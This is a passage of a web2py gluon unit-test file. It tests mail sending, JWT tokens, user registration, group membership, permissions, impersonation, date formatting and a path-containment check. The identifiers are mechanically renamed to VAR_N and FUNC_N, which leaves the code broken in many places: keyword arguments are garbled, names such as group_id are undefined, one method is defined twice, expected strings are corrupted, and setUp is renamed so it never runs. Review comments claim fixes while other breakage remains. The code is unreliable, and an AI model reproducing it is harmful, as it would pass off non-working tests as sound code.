        VAR_20 = Mail()
        VAR_20.settings.server = 'smtp.example.com:25'
        VAR_20.settings.sender = 'you@example.com'
        self.assertTrue(VAR_20.send(to=['somebody@example.com'],
                                    message=('Text only', '<html><pre>HTML Only</pre></html>')))
        VAR_21 = VAR_23.DummySMTP.inbox.pop()
        self.assertTrue(VAR_21.parsed_payload.is_multipart())
        self.assertTrue(VAR_21.parsed_payload.get_content_type() == 'multipart/alternative')
        VAR_24 = VAR_21.parsed_payload.get_payload()
        self.assertTrue('Text only' in VAR_24[0].as_string())
        self.assertTrue('<html><pre>HTML Only</pre></html>' in VAR_24[1].as_string())

    def FUNC_8(self):
        # ssl=True path (DummySMTP also substitutes SMTP_SSL).
        VAR_20 = Mail()
        VAR_20.settings.server = 'smtp.example.com:25'
        VAR_20.settings.sender = 'you@example.com'
        VAR_20.settings.ssl = True
        self.assertTrue(VAR_20.send(to=['somebody@example.com'],
                                    subject='hello',
                                    reply_to='us@example.com',
                                    message='world'))
        VAR_23.DummySMTP.inbox.pop()

    def FUNC_9(self):
        # tls=True path exercises DummySMTP.starttls().
        VAR_20 = Mail()
        VAR_20.settings.server = 'smtp.example.com:25'
        VAR_20.settings.sender = 'you@example.com'
        VAR_20.settings.tls = True
        self.assertTrue(VAR_20.send(to=['somebody@example.com'],
                                    subject='hello',
                                    reply_to='us@example.com',
                                    message='world'))
        VAR_23.DummySMTP.inbox.pop()

    def FUNC_10(self):
        # Attachments round-trip byte-for-byte; open streams are rejected;
        # explicit content_id/content_type are honoured.
        VAR_25 = os.path.abspath(__file__)
        VAR_20 = Mail()
        VAR_20.settings.server = 'smtp.example.com:25'
        VAR_20.settings.sender = 'you@example.com'
        self.assertTrue(VAR_20.send(to=['somebody@example.com'],
                                    subject='hello',
                                    message='world',
                                    attachments=Mail.Attachment(VAR_25)))
        VAR_21 = VAR_23.DummySMTP.inbox.pop()
        VAR_26 = VAR_21.parsed_payload.get_payload(1).get_payload(decode=True)
        with open(VAR_25, 'rb') as mf:
            self.assertEqual(to_bytes(VAR_26), to_bytes(mf.read()))
        VAR_27 = open(VAR_25)
        self.assertRaises(Exception, lambda *VAR_3, **VAR_4: Mail.Attachment(*VAR_3, **VAR_4), VAR_27)
        VAR_27.close()  # fixed: was `stream.close()`, an undefined name
        self.assertTrue(VAR_20.send(to=['somebody@example.com'],
                                    subject='hello',
                                    message='world',
                                    attachments=Mail.Attachment(VAR_25, content_id='trololo', content_type='tra/lala')))
        VAR_21 = VAR_23.DummySMTP.inbox.pop()
        self.assertTrue('Content-Type: tra/lala' in VAR_21.payload)
        self.assertTrue('Content-Id: <trololo>' in VAR_21.payload)
class CLASS_1(unittest.TestCase):
    """Tests for gluon.tools.AuthJWT: token issuing, token refresh, and the
    allows_jwt decorator, against an in-memory DAL/Auth setup.

    Fix applied: self.user_data was built with obfuscated keys
    (VAR_17/VAR_18) but read back as ['username']/['password'] everywhere
    below, which would raise KeyError; the dict keys and the related Auth
    keyword names are restored.
    """

    def FUNC_1(self):
        # NOTE(review): plays the role of unittest's setUp.
        from gluon.tools import AuthJWT
        from gluon import current
        self.request = Request(env={})
        self.request.application = 'a'
        self.request.controller = 'c'
        self.request.function = 'f'
        self.request.folder = 'applications/admin'
        self.current = current
        self.current.request = self.request
        self.db = DAL(VAR_0, check_reserved=['all'])
        self.auth = Auth(self.db)
        self.auth.define_tables(username=True, signature=False)
        # Keys must be 'username'/'password': they are read back below and
        # copied into request.vars for jwt_token_manager().
        self.user_data = dict(username='jwtuser', password='jwtuser123')
        # Store the CRYPT-hashed password, as Auth would on registration.
        self.db.auth_user.insert(username=self.user_data['username'],
                                 password=str(
                                     self.db.auth_user.password.requires[0](
                                         self.user_data['password'])[0]))
        self.jwtauth = AuthJWT(self.auth, secret_key='secret', verify_expiration=True)

    def FUNC_11(self):
        """A token is issued from credentials, then refreshed via _token."""
        import gluon.serializers
        self.request.vars.update(self.user_data)
        self.token = self.jwtauth.jwt_token_manager()
        self.assertIsNotNone(self.token)
        del self.request.vars['username']
        del self.request.vars['password']
        self.request.vars._token = gluon.serializers.json_parser.loads(self.token)['token']
        self.token = self.jwtauth.jwt_token_manager()
        self.assertIsNotNone(self.token)

    def FUNC_12(self):
        """allows_jwt() logs the token's user in for the wrapped callable."""
        import gluon.serializers
        self.request.vars.update(self.user_data)
        self.token = self.jwtauth.jwt_token_manager()
        self.assertIsNotNone(self.token)
        del self.request.vars['username']
        del self.request.vars['password']
        self.token = self.jwtauth.jwt_token_manager()
        self.request.vars._token = gluon.serializers.json_parser.loads(self.token)['token']

        @self.jwtauth.allows_jwt()
        def FUNC_70():
            self.assertEqual(self.user_data['username'], self.auth.user.username)
        FUNC_70()
@unittest.skipIf(VAR_1, "TODO: Imap raises 'Connection refused'")
class CLASS_2(unittest.TestCase):
    """Tests for gluon.tools.Auth against an in-memory DAL.

    FUNC_1 (apparently the unittest setUp hook, renamed by obfuscation)
    builds a fresh request/response/session, an in-memory DAL with the
    auth tables plus a record-versioned table t0, and registers one user
    'bart'.

    NOTE(review): this class carries several obfuscation/rename artifacts
    left as-is here: keyword names such as VAR_17=/VAR_18= in calls to
    Auth APIs (presumably username=/password=), FUNC_65=False (presumably
    login=False), the helper defined as FUNC_13 but invoked as
    self.myassertRaisesRegex, and bare names `group_id`/`user_id` used on
    the right-hand side of keywords where the local variables are
    VAR_38/VAR_43 — confirm against the original web2py sources before
    running.
    """

    def FUNC_13(self, *VAR_3, **VAR_4):
        # Py2/Py3 shim over assertRaisesRegexp/assertRaisesRegex.
        if PY2:
            return getattr(self, 'assertRaisesRegexp')(*VAR_3, **VAR_4)
        return getattr(self, 'assertRaisesRegex')(*VAR_3, **VAR_4)
    def FUNC_1(self):
        # setUp role: fresh web2py globals + DAL + Auth + one user 'bart'.
        self.request = Request(env={})
        self.request.application = 'a'
        self.request.controller = 'c'
        self.request.function = 'f'
        self.request.folder = 'applications/admin'
        self.response = Response()
        self.session = Session()
        VAR_28 = TranslatorFactory('', 'en')
        self.session.connect(self.request, self.response)
        from gluon.globals import current
        self.current = current
        self.current.request = self.request
        self.current.response = self.response
        self.current.session = self.session
        self.current.T = VAR_28
        self.db = DAL(VAR_0, check_reserved=['all'])
        self.auth = Auth(self.db)
        self.auth.define_tables(VAR_17=True, signature=False)
        self.db.define_table('t0', Field('tt'), self.auth.signature)
        self.auth.enable_record_versioning(self.db)
        self.auth.settings.registration_requires_verification = False
        self.auth.settings.registration_requires_approval = False
        self.auth.register_bare(first_name='Bart',
                                last_name='Simpson',
                                VAR_17='bart',
                                email='bart@simpson.com',
                                VAR_18='bart_password')
    def FUNC_14(self):
        # define_tables created all auth tables and bart's default group.
        self.assertTrue('auth_user' in self.db)
        self.assertTrue('auth_group' in self.db)
        self.assertTrue('auth_membership' in self.db)
        self.assertTrue('auth_permission' in self.db)
        self.assertTrue('auth_event' in self.db)
        VAR_29 = self.db(self.db.auth_user.username == 'bart').select().first()
        self.assertEqual(VAR_29['username'], 'bart')
        self.assertEqual(VAR_29['registration_key'], '')
        VAR_30 = self.db(self.db.auth_user.username == 'bart').select().first().id
        VAR_31 = self.db(self.db.auth_group.role == 'user_{0}'.format(VAR_30)).select().first().id
        self.assertTrue(self.db((self.db.auth_membership.group_id == VAR_31) &
                                (self.db.auth_membership.user_id == VAR_30)).select().first())
    def FUNC_15(self):
        # Form-producing actions emit a _formkey; the rest redirect/deny.
        for f in ['login', 'retrieve_password', 'retrieve_username', 'register']:
            VAR_92 = getattr(self.auth, f)().xml()
            self.assertTrue(b'name="_formkey"' in VAR_92)
        for f in ['logout', 'verify_email', 'reset_password', 'change_password', 'profile', 'groups']:
            self.myassertRaisesRegex(HTTP, "303*", getattr(self.auth, f))
        self.myassertRaisesRegex(HTTP, "401*", self.auth.impersonate)
        try:
            for t in ['t0_archive', 't0', 'auth_cas', 'auth_event',
                      'auth_membership', 'auth_permission', 'auth_group',
                      'auth_user']:
                self.db[t].drop()
        except SyntaxError as e:
            # best-effort cleanup: some backends refuse the drop order
            pass
        return
    def FUNC_16(self):
        self.current.request.vars._next = 'next_test'
        self.assertEqual(self.auth.get_vars_next(), 'next_test')
    def FUNC_17(self):
        # enable_record_versioning added the archive table for t0.
        self.assertTrue('t0_archive' in self.db)
    def FUNC_18(self):
        # log_event: records user_id when logged in, None when not, and
        # nothing at all when logging is disabled or description is None.
        self.auth.login_user(self.db(self.db.auth_user.username == 'bart').select().first()) # bypass login_bare()
        VAR_30 = self.db(self.db.auth_user.username == 'bart').select(self.db.auth_user.id).first().id
        self.auth.log_event(description='some_log_event_description_%(var1)s',
                            vars={"var1": "var1"},
                            origin='log_event_test_1')
        VAR_32 = self.db(self.db.auth_event.origin == 'log_event_test_1'
                         ).select(*[self.db.auth_event[f]
                                    for f in self.db.auth_event.fields if f not in ('id', 'time_stamp')]).first().as_dict()
        self.assertEqual(set(VAR_32.items()), set({'origin': 'log_event_test_1',
                                                   'client_ip': None,
                                                   'user_id': VAR_30,
                                                   'description': 'some_log_event_description_var1'}.items()))
        self.auth.logout_bare()
        self.auth.log_event(description='some_log_event_description_%(var2)s',
                            vars={"var2": "var2"},
                            origin='log_event_test_2')
        VAR_32 = self.db(self.db.auth_event.origin == 'log_event_test_2'
                         ).select(*[self.db.auth_event[f]
                                    for f in self.db.auth_event.fields if f not in ('id', 'time_stamp')]).first().as_dict()
        self.assertEqual(set(VAR_32.items()), set({'origin': 'log_event_test_2',
                                                   'client_ip': None,
                                                   'user_id': None,
                                                   'description': 'some_log_event_description_var2'}.items()))
        self.auth.settings.logging_enabled = False
        VAR_33 = self.db(self.db.auth_event.id > 0).count()
        self.auth.log_event(description='some_log_event_description_%(var3)s',
                            vars={"var3": "var3"},
                            origin='log_event_test_3')
        VAR_34 = self.db(self.db.auth_event.id > 0).count()
        self.assertEqual(VAR_34, VAR_33)
        self.auth.settings.logging_enabled = True
        VAR_33 = self.db(self.db.auth_event.id > 0).count()
        self.auth.log_event(description=None,
                            vars={"var4": "var4"},
                            origin='log_event_test_4')
        VAR_34 = self.db(self.db.auth_event.id > 0).count()
        self.assertEqual(VAR_34, VAR_33)
    def FUNC_19(self):
        # get_or_create_user: returns existing users, creates new ones,
        # and returns None when no usable email is given.
        self.db.auth_user.insert(email='user1@test.com', VAR_17='user1', VAR_18='password_123')
        self.db.commit()
        self.assertEqual(self.auth.get_or_create_user({'email': 'user1@test.com',
                                                       'username': 'user1',
                                                       'password': 'password_123'
                                                       })['username'], 'user1')
        self.assertEqual(self.auth.get_or_create_user({'email': 'user2@test.com',
                                                       'username': 'user2'})['username'], 'user2')
        self.assertEqual(self.auth.get_or_create_user({'first_name': 'Omer',
                                                       'last_name': 'Simpson',
                                                       'email': 'user3@test.com',
                                                       'registration_id': 'user3',
                                                       'username': 'user3'})['username'], 'user3')
        self.assertEqual(self.auth.get_or_create_user({'email': ''}), None)
        self.db.auth_user.truncate()
        self.db.commit()
    def FUNC_20(self):
        self.auth.login_bare(VAR_17='bart', VAR_18='bart_password')
        self.assertTrue(self.auth.is_logged_in())
        self.auth.logout_bare()
        self.assertFalse(self.auth.login_bare(VAR_17='bart', VAR_18='wrong_password'))
    def FUNC_21(self):
        # register_bare: rejects empty args, duplicates, unknown fields and
        # invalid emails; creates a valid new user otherwise.
        self.assertRaises(ValueError, self.auth.register_bare)
        self.assertEqual(self.auth.register_bare(VAR_17='bart', VAR_18='wrong_password'), False)
        self.assertEqual(self.auth.register_bare(VAR_17='user2',
                                                 email='user2@test.com',
                                                 VAR_18='password_123')['username'], 'user2')
        self.assertRaises(ValueError, self.auth.register_bare,
                          **dict(wrong_field_name='user3', VAR_18='password_123'))
        self.assertRaises(ValueError, self.auth.register_bare,
                          **dict(email='user4@', VAR_18='password_123'))
        self.db.auth_user.truncate()
        self.db.commit()
    def FUNC_22(self):
        self.auth.login_user(self.db(self.db.auth_user.username == 'bart').select().first()) # bypass login_bare()
        self.assertTrue(self.auth.is_logged_in())
        self.auth.logout_bare()
        self.assertFalse(self.auth.is_logged_in())
    def FUNC_23(self):
        # is_logged_in only checks truthiness of auth.user.
        self.auth.user = 'logged_in'
        self.assertTrue(self.auth.is_logged_in())
        self.auth.user = None
        self.assertFalse(self.auth.is_logged_in())
    def FUNC_24(self):
        self.assertTrue(self.auth.random_password())
    def FUNC_25(self):
        self.auth.login_user(self.db(self.db.auth_user.username == 'bart').select().first()) # bypass login_bare()
        self.auth.settings.bulk_register_enabled = True
        VAR_35 = self.auth.bulk_register(max_emails=10).xml()
        self.assertTrue(b'name="_formkey"' in VAR_35)
    def FUNC_26(self):
        self.auth.login_user(self.db(self.db.auth_user.username == 'bart').select().first()) # bypass login_bare()
        VAR_36 = getattr(self.auth, 'change_password')().xml()
        self.assertTrue(b'name="_formkey"' in VAR_36)
    def FUNC_27(self):
        self.auth.login_user(self.db(self.db.auth_user.username == 'bart').select().first()) # bypass login_bare()
        VAR_37 = getattr(self.auth, 'profile')().xml()
        self.assertTrue(b'name="_formkey"' in VAR_37)
    def FUNC_28(self):
        # Impersonation: bart (granted the 'impersonate' permission) can
        # impersonate omer; omer cannot impersonate bart (403); unknown
        # ids yield 401; impersonate(0) ends the impersonation.
        # NOTE(review): `group_id`/`user_id` below are undefined names —
        # renaming artifacts for the local VAR_38 / computed user id.
        self.auth.get_or_create_user(dict(first_name='Omer',
                                          last_name='Simpson',
                                          VAR_17='omer',
                                          email='omer@test.com',
                                          VAR_18='password_omer',
                                          registration_key='',
                                          registration_id=''),
                                     FUNC_65=False)
        self.db.commit()
        self.assertFalse(self.auth.is_logged_in())
        VAR_38 = self.auth.add_group('impersonate')
        self.auth.add_membership(VAR_43=self.db(self.db.auth_user.username == 'bart'
                                                ).select(self.db.auth_user.id).first().id,
                                 VAR_38=group_id)
        self.auth.add_permission(VAR_38=group_id,
                                 name='impersonate',
                                 table_name='auth_user',
                                 record_id=0)
        self.auth.login_user(self.db(self.db.auth_user.username == 'bart').select().first()) # bypass login_bare()
        self.assertTrue(self.auth.is_logged_in())
        VAR_30 = self.db(self.db.auth_user.username == 'bart').select(self.db.auth_user.id).first().id
        self.assertEqual(self.auth.user_id, VAR_30)
        self.assertEqual(self.auth.impersonate().xml(),
                         b'<form action="#" enctype="multipart/form-data" method="post"><table><tr id="no_table_user_id__row"><td class="w2p_fl"><label class="" for="no_table_user_id" id="no_table_user_id__label">User Id: </label></td><td class="w2p_fw"><input class="integer" id="no_table_user_id" name="user_id" type="text" value="" /></td><td class="w2p_fc"></td></tr><tr id="submit_record__row"><td class="w2p_fl"></td><td class="w2p_fw"><input type="submit" value="Submit" /></td><td class="w2p_fc"></td></tr></table></form>')
        self.assertEqual(self.auth.impersonate(VAR_30), None)
        self.assertFalse(self.auth.is_impersonating()) # User shouldn't impersonate itself?
        VAR_39 = self.db(self.db.auth_user.username == 'omer').select(self.db.auth_user.id).first().id
        VAR_40 = self.auth.impersonate(VAR_43=VAR_39)
        self.assertTrue(self.auth.is_impersonating())
        self.assertEqual(self.auth.user_id, VAR_39) # we make it really sure
        self.assertEqual(VAR_40.xml(),
                         b'<form action="#" enctype="multipart/form-data" method="post"><table><tr id="auth_user_id__row"><td class="w2p_fl"><label class="readonly" for="auth_user_id" id="auth_user_id__label">Id: </label></td><td class="w2p_fw"><span id="auth_user_id">2</span></td><td class="w2p_fc"></td></tr><tr id="auth_user_first_name__row"><td class="w2p_fl"><label class="readonly" for="auth_user_first_name" id="auth_user_first_name__label">First name: </label></td><td class="w2p_fw">Omer</td><td class="w2p_fc"></td></tr><tr id="auth_user_last_name__row"><td class="w2p_fl"><label class="readonly" for="auth_user_last_name" id="auth_user_last_name__label">Last name: </label></td><td class="w2p_fw">Simpson</td><td class="w2p_fc"></td></tr><tr id="auth_user_email__row"><td class="w2p_fl"><label class="readonly" for="auth_user_email" id="auth_user_email__label">E-VAR_20: </label></td><td class="w2p_fw">omer@test.com</td><td class="w2p_fc"></td></tr><tr id="auth_user_username__row"><td class="w2p_fl"><label class="readonly" for="auth_user_username" id="auth_user_username__label">Username: </label></td><td class="w2p_fw">omer</td><td class="w2p_fc"></td></tr></table><div style="display:none;"><input name="id" type="hidden" value="2" /></div></form>')
        self.auth.logout_bare()
        self.auth.login_user(self.db(self.db.auth_user.username == 'omer').select().first()) # bypass login_bare()
        self.myassertRaisesRegex(HTTP, "403*", self.auth.impersonate, VAR_30)
        self.auth.logout_bare()
        self.auth.login_user(self.db(self.db.auth_user.username == 'bart').select().first()) # bypass login_bare()
        self.myassertRaisesRegex(HTTP, "401*", self.auth.impersonate, 1000) # VAR_42 with id 1000 shouldn't exist
        self.auth.impersonate(VAR_43=VAR_39)
        self.assertTrue(self.auth.is_impersonating())
        self.assertEqual(self.auth.impersonate(VAR_43=0), None)
    def FUNC_29(self):
        self.auth.login_user(self.db(self.db.auth_user.username == 'bart').select().first()) # bypass login_bare()
        self.assertEqual(self.auth.groups().xml(),
                         b'<table><tr><td><h3>user_1(1)</h3></td></tr><tr><td><p></p></td></tr></table>')
    def FUNC_30(self):
        # not_authorized: 403 for ajax requests, message otherwise.
        self.current.request.ajax = 'facke_ajax_request'
        self.myassertRaisesRegex(HTTP, "403*", self.auth.not_authorized)
        self.current.request.ajax = None
        self.assertEqual(self.auth.not_authorized(), self.auth.messages.access_denied)
    def FUNC_12(self):
        self.myassertRaisesRegex(HTTP, "400*", self.auth.allows_jwt)
    def FUNC_31(self):
        self.assertEqual(self.auth.add_group(role='a_group', description='a_group_role_description'),
                         self.db(self.db.auth_group.role == 'a_group').select(self.db.auth_group.id).first().id)
    def FUNC_32(self):
        VAR_31 = 1 # Should be group 1, 'user_1'
        self.assertEqual(self.auth.del_group(VAR_38=VAR_31), None)
    def FUNC_33(self):
        self.assertEqual(self.auth.id_group(role='user_1'), 1)
        self.assertEqual(self.auth.id_group(role='non_existing_role_name'), None)
    def FUNC_34(self):
        self.assertEqual(self.auth.user_group(VAR_43=1), 1)
    def FUNC_35(self):
        # user_group_role: current user, explicit user, and disabled case.
        self.auth.login_user(self.db(self.db.auth_user.username == 'bart').select().first()) # bypass login_bare()
        VAR_41 = 'user_%s' % self.db(self.db.auth_user.username == 'bart'
                                     ).select(self.db.auth_user.id).first().id
        self.assertEqual(self.auth.user_group_role(), VAR_41)
        self.auth.logout_bare()
        self.assertEqual(self.auth.user_group_role(VAR_43=1), 'user_1')
        self.auth.settings.create_user_groups = None
        self.assertEqual(self.auth.user_group_role(VAR_43=1), None)
    def FUNC_36(self):
        # has_membership by role name, by group id, logged in or not; the
        # repeated call must not add extra auth_event rows.
        self.auth.login_user(self.db(self.db.auth_user.username == 'bart').select().first()) # bypass login_bare()
        self.assertTrue(self.auth.has_membership('user_1'))
        self.assertFalse(self.auth.has_membership('user_555'))
        self.assertTrue(self.auth.has_membership(VAR_38=1))
        self.auth.logout_bare()
        self.assertTrue(self.auth.has_membership(role='user_1', VAR_43=1))
        self.assertTrue(self.auth.has_membership(VAR_38=1, VAR_43=1))
        VAR_33 = self.db(self.db.auth_event.id > 0).count()
        self.assertTrue(self.auth.has_membership(VAR_38=1, VAR_43=1))
        VAR_34 = self.db(self.db.auth_event.id > 0).count()
        self.assertEqual(VAR_34, VAR_33)
    def FUNC_37(self):
        # add_membership/del_membership in every calling convention, plus
        # validation errors for unknown groups/roles/users.
        # NOTE(review): `group_id`/`user_id` on the right-hand side of the
        # keywords below are undefined names (renaming artifacts for the
        # locals VAR_38/VAR_43) — verify against the original sources.
        VAR_42 = self.db(self.db.auth_user.username == 'bart').select().first() # bypass login_bare()
        VAR_43 = VAR_42.id
        VAR_44 = 'test_add_membership_group'
        VAR_38 = self.auth.add_group(VAR_44)
        self.assertFalse(self.auth.has_membership(VAR_44))
        self.auth.add_membership(VAR_38=group_id, VAR_43=user_id)
        self.assertTrue(self.auth.has_membership(VAR_38, VAR_43=user_id))
        self.auth.del_membership(VAR_38=group_id, VAR_43=user_id)
        self.assertFalse(self.auth.has_membership(VAR_38, VAR_43=user_id))
        self.auth.add_membership(role=VAR_44, VAR_43=user_id)
        self.assertTrue(self.auth.has_membership(VAR_38, VAR_43=user_id))
        self.auth.del_membership(VAR_38=group_id, VAR_43=user_id)
        self.assertFalse(self.auth.has_membership(VAR_38, VAR_43=user_id))
        with self.myassertRaisesRegex(ValueError, '^VAR_38 not provided or invalid$'):
            self.auth.add_membership(VAR_38='not_existing_group_name', VAR_43=user_id)
        with self.myassertRaisesRegex(ValueError, '^VAR_38 not provided or invalid$'):
            self.auth.add_membership(role='not_existing_role_name', VAR_43=user_id)
        with self.myassertRaisesRegex(ValueError, '^VAR_43 not provided or invalid$'):
            self.auth.add_membership(VAR_38=group_id, VAR_43=None)
        with self.myassertRaisesRegex(ValueError, '^VAR_43 not provided or invalid$'):
            self.auth.add_membership(role=VAR_44, VAR_43=None)
        self.auth.login_user(VAR_42)
        self.auth.add_membership(VAR_38=group_id)
        self.assertTrue(self.auth.has_membership(VAR_38))
        self.auth.del_membership(VAR_38=group_id)
        self.assertFalse(self.auth.has_membership(VAR_38))
        self.auth.add_membership(role=VAR_44)
        self.assertTrue(self.auth.has_membership(VAR_38))
        self.auth.del_membership(VAR_38=group_id)
        self.assertFalse(self.auth.has_membership(VAR_38))
        self.auth.add_membership(VAR_44)
        self.assertTrue(self.auth.has_membership(VAR_38))
        self.auth.del_membership(VAR_38=group_id)
        self.assertFalse(self.auth.has_membership(VAR_38))
        VAR_45 = self.auth.add_membership(VAR_38)
        self.assertTrue(self.auth.has_membership(VAR_38))
        VAR_46 = self.auth.add_membership(VAR_38)
        self.assertEqual(VAR_45, VAR_46)
        self.auth.del_membership(VAR_38=group_id)
        self.assertFalse(self.auth.has_membership(VAR_38))
        with self.myassertRaisesRegex(ValueError, '^VAR_38 not provided or invalid$'):
            self.auth.add_membership(VAR_38='not_existing_group_name')
        with self.myassertRaisesRegex(ValueError, '^VAR_38 not provided or invalid$'):
            self.auth.add_membership(role='not_existing_role_name')
    def FUNC_38(self):
        # del_membership: for self while logged in, and for an explicit
        # user when logged out (no-op without a user).
        self.auth.login_user(self.db(self.db.auth_user.username == 'bart').select().first()) # bypass login_bare()
        VAR_33 = self.db(self.db.auth_event.id > 0).count()
        VAR_47 = self.db(self.db.auth_membership.group_id == self.auth.id_group('user_1')
                         ).select(self.db.auth_membership.id).first().id
        self.assertEqual(self.auth.del_membership('user_1'), VAR_47)
        VAR_34 = self.db(self.db.auth_event.id > 0).count()
        self.assertEqual(VAR_34, VAR_33)
        VAR_38 = self.auth.add_group('some_test_group')
        VAR_48 = self.auth.add_membership('some_test_group')
        self.assertEqual(self.auth.user_groups[VAR_38], 'some_test_group')
        self.auth.logout_bare()
        self.assertFalse(self.auth.del_membership('some_test_group'))
        self.assertEqual(set(self.db.auth_membership(VAR_48).as_dict().items()),
                         set({'group_id': 2, 'user_id': 1, 'id': 2}.items())) # is not deleted
        VAR_30 = self.db(self.db.auth_user.username == 'bart').select(self.db.auth_user.id).first().id
        self.assertTrue(self.auth.del_membership('some_test_group', VAR_43=VAR_30))
        self.assertEqual(self.db.auth_membership(VAR_48), None) # is really deleted
    def FUNC_39(self):
        self.auth.login_user(self.db(self.db.auth_user.username == 'bart').select().first()) # bypass login_bare()
        VAR_30 = self.db(self.db.auth_user.username == 'bart').select(self.db.auth_user.id).first().id
        self.auth.add_permission(VAR_38=self.auth.id_group('user_1'),
                                 name='some_permission',
                                 table_name='auth_user',
                                 record_id=0,
                                 )
        self.assertTrue(self.auth.has_permission(name='some_permission',
                                                 table_name='auth_user',
                                                 record_id=0,
                                                 VAR_43=VAR_30,
                                                 VAR_38=self.auth.id_group('user_1')))
        self.assertFalse(self.auth.has_permission(name='some_other_permission',
                                                  table_name='auth_user',
                                                  record_id=0,
                                                  VAR_43=VAR_30,
                                                  VAR_38=self.auth.id_group('user_1')))
    def FUNC_40(self):
        # add_permission: creates rows, group 0 means "current user's
        # group", duplicates are allowed (new id each time).
        VAR_33 = self.db(self.db.auth_event.id > 0).count()
        VAR_49 = \
            self.auth.add_permission(VAR_38=self.auth.id_group('user_1'),
                                     name='some_permission',
                                     table_name='auth_user',
                                     record_id=0,
                                     )
        VAR_34 = self.db(self.db.auth_event.id > 0).count()
        self.assertEqual(VAR_34, VAR_33)
        VAR_50 = \
            self.db(self.db.auth_permission.id == VAR_49).count()
        self.assertTrue(VAR_50)
        VAR_50 = \
            self.db((self.db.auth_permission.group_id == self.auth.id_group('user_1')) &
                    (self.db.auth_permission.name == 'no_permission') &
                    (self.db.auth_permission.table_name == 'no_table') &
                    (self.db.auth_permission.record_id == 0)).count()
        self.assertFalse(VAR_50)
        self.auth.login_user(self.db(self.db.auth_user.username == 'bart').select().first()) # bypass login_bare()
        VAR_49 = \
            self.auth.add_permission(VAR_38=0,
                                     name='user_1_permission',
                                     table_name='auth_user',
                                     record_id=0,
                                     )
        VAR_51 = \
            self.db(self.db.auth_permission.id == VAR_49).select(self.db.auth_permission.name).first().name
        self.assertEqual(VAR_51, 'user_1_permission')
        VAR_49 =\
            self.auth.add_permission(VAR_38=0,
                                     name='user_1_permission',
                                     table_name='auth_user',
                                     record_id=0,
                                     )
        self.assertTrue(VAR_49)
    def FUNC_41(self):
        # del_permission removes the row created by add_permission.
        VAR_49 = \
            self.auth.add_permission(VAR_38=self.auth.id_group('user_1'),
                                     name='del_permission_test',
                                     table_name='auth_user',
                                     record_id=0,
                                     )
        VAR_33 = self.db(self.db.auth_event.id > 0).count()
        self.assertTrue(self.auth.del_permission(VAR_38=self.auth.id_group('user_1'),
                                                 name='del_permission_test',
                                                 table_name='auth_user',
                                                 record_id=0,))
        VAR_34 = self.db(self.db.auth_event.id > 0).count()
        self.assertEqual(VAR_34, VAR_33)
        VAR_50 = \
            self.db(self.db.auth_permission.id == VAR_49).count()
        self.assertFalse(VAR_50)
class CLASS_3(unittest.TestCase):
    """Tests for the prettydate() human-readable date formatter."""

    def FUNC_42(self):
        now = datetime.datetime.now()
        self.assertEqual(prettydate(VAR_78=now), 'now')
        # (offset into the past, expected label) — boundary values on both
        # sides of each unit transition.
        past_cases = [
            (datetime.timedelta(seconds=1), '1 second ago'),
            (datetime.timedelta(seconds=2), '2 seconds ago'),
            (datetime.timedelta(seconds=60), '1 minute ago'),
            (datetime.timedelta(seconds=61), '1 minute ago'),
            (datetime.timedelta(seconds=120), '2 minutes ago'),
            (datetime.timedelta(seconds=121), '2 minutes ago'),
            (datetime.timedelta(seconds=60 * 60), '1 hour ago'),
            (datetime.timedelta(seconds=3601), '1 hour ago'),
            (datetime.timedelta(seconds=2 * 60 * 60), '2 hours ago'),
            (datetime.timedelta(seconds=2 * 60 * 60 + 1), '2 hours ago'),
            (datetime.timedelta(days=1), '1 day ago'),
            (datetime.timedelta(days=2), '2 days ago'),
            (datetime.timedelta(days=7), '1 week ago'),
            (datetime.timedelta(days=8), '1 week ago'),
            (datetime.timedelta(days=14), '2 weeks ago'),
            (datetime.timedelta(days=15), '2 weeks ago'),
            (datetime.timedelta(days=21), '3 weeks ago'),
            (datetime.timedelta(days=27), '1 month ago'),
            (datetime.timedelta(days=28), '1 month ago'),
            (datetime.timedelta(days=60), '2 months ago'),
            (datetime.timedelta(days=90), '3 months ago'),
            (datetime.timedelta(days=365), '1 year ago'),
            (datetime.timedelta(days=366), '1 year ago'),
            (datetime.timedelta(days=2 * 365), '2 years ago'),
            (datetime.timedelta(days=2 * 365 + 1), '2 years ago'),
        ]
        for offset, expected in past_cases:
            self.assertEqual(prettydate(VAR_78=now - offset), expected)
        # date (not datetime) inputs.
        # BUG FIX: the original passed the undefined name `d` here
        # (prettydate(VAR_78=d)), which raised NameError; the freshly
        # computed date must be passed instead.
        today = now.date()
        self.assertEqual(prettydate(VAR_78=today), 'now')
        self.assertEqual(
            prettydate(VAR_78=now.date() - datetime.timedelta(days=1)),
            '1 day ago')
        self.assertEqual(
            prettydate(VAR_78=now.date() - datetime.timedelta(days=2)),
            '2 days ago')
        # Offsets into the future (negative deltas).
        self.assertEqual(
            prettydate(VAR_78=now - datetime.timedelta(seconds=-65)),
            '1 minute from now')
        self.assertEqual(
            prettydate(VAR_78=now - datetime.timedelta(hours=-23.5)),
            '23 hours from now')
        self.assertEqual(
            prettydate(VAR_78=now - datetime.timedelta(days=-366)),
            '1 year from now')
        # UTC mode.
        utcnow = datetime.datetime.utcnow()
        self.assertEqual(prettydate(VAR_78=utcnow, utc=True), 'now')
        self.assertEqual(
            prettydate(VAR_78=utcnow - datetime.timedelta(seconds=1), utc=True),
            '1 second ago')
        # Degenerate inputs.
        self.assertEqual(prettydate(VAR_78=None), '')
        self.assertEqual(prettydate(VAR_78='invalid_date'), '[invalid date]')
# Shorthand path joiner used throughout the filesystem tests below.
VAR_2 = os.path.join
def FUNC_0():
    """Return True when running on a POSIX platform (symlinks available)."""
    return 'posix' == os.name
class CLASS_4(unittest.TestCase):
    """Unit tests for the private Expose.__in_base path-containment check."""

    def FUNC_43(self):
        # Pairs where the first path lies inside (or equals) the second.
        contained = (
            ('/foo/bar', '/foo'),
            ('/foo', '/foo'),
            ('/foo', '/'),
            ('/', '/'),
        )
        for child, parent in contained:
            self.assertTrue(
                Expose._Expose__in_base(subdir=child, basedir=parent, sep='/'),
                '%s is not under %s' % (child, parent))

    def FUNC_44(self):
        # Pairs where the first path lies outside the second (including
        # the prefix-but-not-directory case '/foobar' vs '/foo').
        not_contained = (
            ('/foobar', '/foo'),
            ('/foo', '/foo/bar'),
            ('/bar', '/foo'),
            ('/foo/bar', '/bar'),
            ('/', '/x'),
        )
        for child, parent in not_contained:
            self.assertFalse(
                Expose._Expose__in_base(subdir=child, basedir=parent, sep='/'),
                '%s should not be under %s' % (child, parent))
class CLASS_5(unittest.TestCase):
